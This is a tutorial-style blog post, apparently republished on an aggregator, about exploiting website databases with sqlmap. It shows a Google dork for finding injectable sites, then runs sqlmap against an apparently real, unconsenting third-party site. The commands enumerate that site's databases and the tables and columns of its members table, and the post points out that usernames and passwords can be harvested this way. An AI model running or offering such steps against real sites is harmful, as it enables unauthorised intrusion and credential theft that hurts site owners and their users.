Exploit Website Databases Using SQLmap

? Exploit Website Databases Using SQLmap ?

✨SQLmap is one of the most famous tools for SQL injection. It is pre-installed in Kali Linux so no need to download it from anywhere.

What is a SQL injection attack❓

✨SQLi is a common attack where the attac…


This content originally appeared on DEV Community and was authored by Hafiz Muhammad Attaullah

? Exploit Website Databases Using SQLmap ?

✨SQLmap is one of the most famous tools for SQL injection. It is pre-installed in Kali Linux so no need to download it from anywhere.

What is a SQL injection attack❓

✨SQLi is a common attack where the attacker injects and executes malicious SQL requests in order to get hold of the web databases. These attacks are common in vulnerable websites that use SQL RDBMS to store databases

So today we'll perform an SQLi attack on a vulnerable website

✅ Requirements

⭕️Kali

⭕️Knowledge on Google Dorking

✅ Steps

⭕️ Google Dork vulnerable websites

First of all we have to get a vulnerable website to perform the attack. So we'll use Google Dorking. In simple words, it means that using Google search engine, we can use some special codes in order to get some security holes in websites. Here I'm gonna use this Dork to get SQLi vulnerable websites

inurl:index.php?id=

This will have many results. I've chosen the following website

http://www.asfaa.org/members.php?id=1

⭕️ Get the vulnerability of the website

To get the vulnerability, I'll use the following trick

Add 1 with Asterix * and reload the website

http://www.asfaa.org/members.php?id=1*

When the website shows error, it means that it's vulnerable

⭕️ Fire up Sqlmap ?

Open terminal. Then type there

sqlmap -u yoururl

⚠️Make sure to replace the Asterix with the original value and give the full URL

In my case, I typed

sqlmap -u http://www.asfaa.org/members.php?id=1

It'll start injecting malicious SQL requests. Once done, you'll notice the changes

⭕️ Exploit databases

Now we need to type the next command

sqlmap -u yoururl --dbs

When I did it in my case, I received the following databases

information_schema
db83231_acolop
db83231_asfaa

⭕️ Extract the tables and columns

Now, you can extract the tables of any of the databases using the command

sqlmap -u yoururl -D databasename --tables

For columns,

sqlmap -u yoururl -D databasename -T tablename --columns

I did the following

sqlmap -u http://www.asfaa.org/members.php?id=1 -D db83231_asfaa --tables

sqlmap -u http://www.asfaa.org/members.php?id=1 -D db83231_asfaa -T members --columns

And I got lots of results ❗️

ℹ️ One main advantage of SQLi is that some websites store usernames and passwords in SQL databases that can be exploited.

Hafiz Muhammad Attaullah


This content originally appeared on DEV Community and was authored by Hafiz Muhammad Attaullah


Print Share Comment Cite Upload Translate Updates
APA

Hafiz Muhammad Attaullah | Sciencx (2021-06-05T17:17:47+00:00) Exploit Website Databases Using SQLmap. Retrieved from https://www.scien.cx/2021/06/05/exploit-website-databases-using-sqlmap/

MLA
" » Exploit Website Databases Using SQLmap." Hafiz Muhammad Attaullah | Sciencx - Saturday June 5, 2021, https://www.scien.cx/2021/06/05/exploit-website-databases-using-sqlmap/
HARVARD
Hafiz Muhammad Attaullah | Sciencx Saturday June 5, 2021 » Exploit Website Databases Using SQLmap., viewed ,<https://www.scien.cx/2021/06/05/exploit-website-databases-using-sqlmap/>
VANCOUVER
Hafiz Muhammad Attaullah | Sciencx - » Exploit Website Databases Using SQLmap. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2021/06/05/exploit-website-databases-using-sqlmap/
CHICAGO
" » Exploit Website Databases Using SQLmap." Hafiz Muhammad Attaullah | Sciencx - Accessed . https://www.scien.cx/2021/06/05/exploit-website-databases-using-sqlmap/
IEEE
" » Exploit Website Databases Using SQLmap." Hafiz Muhammad Attaullah | Sciencx [Online]. Available: https://www.scien.cx/2021/06/05/exploit-website-databases-using-sqlmap/. [Accessed: ]
rf:citation
» Exploit Website Databases Using SQLmap | Hafiz Muhammad Attaullah | Sciencx | https://www.scien.cx/2021/06/05/exploit-website-databases-using-sqlmap/ |

Please log in to upload a file.




There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.